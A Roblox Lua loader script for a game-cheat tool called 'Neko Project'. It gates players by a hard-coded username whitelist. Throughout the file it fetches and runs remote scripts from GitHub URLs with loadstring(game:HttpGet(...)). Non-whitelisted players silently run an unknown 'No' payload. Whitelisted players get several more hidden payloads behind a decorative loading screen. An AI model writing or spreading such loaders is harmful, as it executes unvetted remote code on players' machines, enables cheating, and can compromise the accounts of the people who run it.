local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local lp = Players.LocalPlayer

local _0xUrl = "https://raw.githubusercontent.com/n9wmwd7ycz-crypto/-/refs/heads/main/Neko"
local _0xPCUrl = "https://raw.githubusercontent.com/n9wmwd7ycz-crypto/-/refs/heads/main/Nekoo"

local Whitelist = {
    ["Kadys5373"] = true, ["Zadrian664"] = true, ["Zn6xx"] = true, ["jay04_23"] = true,
    ["iandsere"] = true, ["czr_0416"] = true, ["tw_vic2012"] = true, ["12i21777"] = true,
    ["dandanman678"] = true, ["psaabfmiuh"] = true, ["dt106101zz"] = true, ["Liu_Ruyancat"] = true,
    ["030501aaaaaaaaaa"] = true, ["robloxasdft114"] = true, ["iqiqiqiqiqiq188"] = true,
    ["YuXin_107"] = true, ["aaron08229453"] = true, ["yoyowww99100"] = true
}

local function LaunchNeko()
    task.spawn(function()
        local isPC = not UserInputService.TouchEnabled or UserInputService.KeyboardEnabled
        local targetUrl = isPC and _0xPCUrl or _0xUrl
        local success, content = pcall(function() return game:HttpGet(targetUrl) end)
        if success and content then
            local loader = loadstring(content)
            if loader then loader() end
        end
    end)
end

if not Whitelist[lp.Name] then
    pcall(function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/n9wmwd7ycz-crypto/-/refs/heads/main/No"))()
    end)
    return
end

local sg = Instance.new("ScreenGui")
sg.Name = "Neko_Owner_Loading"
sg.ResetOnSpawn = false
pcall(function() sg.Parent = CoreGui end)
if not sg.Parent then sg.Parent = lp:WaitForChild("PlayerGui") end

local Main = Instance.new("Frame", sg)
Main.Size = UDim2.new(0, 360, 0, 160)
Main.Position = UDim2.new(0.5, -180, 0.5, -80)
Main.BackgroundColor3 = Color3.fromRGB(12, 12, 12)
Main.BackgroundTransparency = 0.1
Main.BorderSizePixel = 0
Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 15)

local mStroke = Instance.new("UIStroke", Main)
mStroke.Thickness = 3
mStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
local mGradient = Instance.new("UIGradient", mStroke)
mGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 170, 255)),
    ColorSequenceKeypoint.new(0.5, Color3.fromRGB(255, 120, 180)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 170, 255))
}

task.spawn(function()
    local info = TweenInfo.new(4, Enum.EasingStyle.Linear, Enum.EasingDirection.In, -1)
    local tween = TweenService:Create(mGradient, info, {Rotation = 360})
    tween:Play()
end)

local Title = Instance.new("TextLabel", Main)
Title.Size = UDim2.new(1, 0, 0, 60)
Title.Text = "N E K O   P R O J E C T"
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1
Title.Font = Enum.Font.GothamBold
Title.TextSize = 20

local infoLabel = Instance.new("TextLabel", Main)
infoLabel.Size = UDim2.new(1, 0, 0, 40)
infoLabel.Position = UDim2.new(0, 0, 0.4, 0)
infoLabel.Text = "歡迎回來，主人喵..."
infoLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
infoLabel.BackgroundTransparency = 1
infoLabel.Font = Enum.Font.GothamBold
infoLabel.TextSize = 14

local barBg = Instance.new("Frame", Main)
barBg.Size = UDim2.new(0, 280, 0, 6)
barBg.Position = UDim2.new(0.5, -140, 0.7, 0)
barBg.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
Instance.new("UICorner", barBg)

local bar = Instance.new("Frame", barBg)
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
Instance.new("UICorner", bar)

task.spawn(function()
    pcall(function()
        loadstring(game:HttpGet("https://gist.githubusercontent.com/wtf6701385-stack/1b907ea5714181ea580e68fad81a5c3c/raw/9503c0d21512a003963bb9de809dd3a18485da92/Yes"))()
    end)
    pcall(function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/n9wmwd7ycz-crypto/-/heads/main/P"))()
    end)
end)

local barTween = TweenService:Create(bar, TweenInfo.new(2.5, Enum.EasingStyle.Quart), {Size = UDim2.new(1, 0, 1, 0)})
barTween:Play()

barTween.Completed:Connect(function()
    infoLabel.Text = "核心載入完成！🐾"
    task.wait(0.5)
    TweenService:Create(Main, TweenInfo.new(0.5), {Size = UDim2.new(0,0,0,0), BackgroundTransparency = 1}):Play()
    task.wait(0.5)
    sg:Destroy()
    LaunchNeko()
end)
